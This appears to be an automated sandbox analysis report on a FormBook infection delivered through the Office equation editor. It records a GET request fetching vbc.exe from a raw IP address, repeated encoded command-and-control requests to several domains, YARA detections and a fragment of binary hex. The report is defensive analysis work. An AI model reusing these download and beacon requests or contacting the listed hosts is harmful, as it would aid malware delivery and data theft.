16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 02
      Source: global trafficHTTP traffic detected: GET /ddr/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.143Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000009.00000000.486663706.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: CFE3BF36.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000009.00000000.503345454.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000009.00000000.487570517.000000000447A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
      Source: ipconfig.exe, 0000000B.00000002.688497436.00000000026B2000.00000004.00020000.sdmpString found in binary or memory: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFE3BF36.emfJump to behavior
      Source: unknownDNS traffic detected: queries for: www.americanstonesusa.com
      Source: global trafficHTTP traffic detected: GET /ddr/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.143Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1Host: www.authorjameswshepherdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1Host: www.hanlansmojitovillage.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.thaysay.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.onpar-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1Host: www.authorjameswshepherdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1Host: www.hanlansmojitovillage.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.thaysay.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.onpar-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      .NET source code contains very large stringsShow sources
      Source: vbc[1].exe.4.dr, Forms/mainForm.csLong String: Length: 38272
      Source: vbc.exe.4.dr, Forms/mainForm.csLong String: Length: 38272
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 8.2.vbc.exe.200000.1.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 8.0.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E30706_2_001E3070
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E009C6_2_001E009C
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E11216_2_001E1121
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E1B006_2_001E1B00
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E3C286_2_001E3C28
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E44A06_2_001E44A0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E5D906_2_001E5D90
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E4EF16_2_001E4EF1
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E17006_2_001E1700
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E68A86_2_001E68A8
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E82106_2_001E8210
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E82006_2_001E8200
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EC2C76_2_001EC2C7
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E6B9A6_2_001E6B9A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E3B886_2_001E3B88
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E13B06_2_001E13B0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E6BA86_2_001E6BA8
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E83E06_2_001E83E0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EAC0A6_2_001EAC0A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E5CA96_2_001E5CA9
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E04E16_2_001E04E1
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E7D386_2_001E7D38
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E7D486_2_001E7D48
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EB5D06_2_001EB5D0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EAF316_2_001EAF31
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EA7486_2_001EA748
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EAF406_2_001EAF40
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E7F806_2_001E7F80
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004010308_2_00401030
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B8D68_2_0041B8D6
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041C2CA8_2_0041C2CA
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041CB5C8_2_0041CB5C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00408C5D8_2_00408C5D
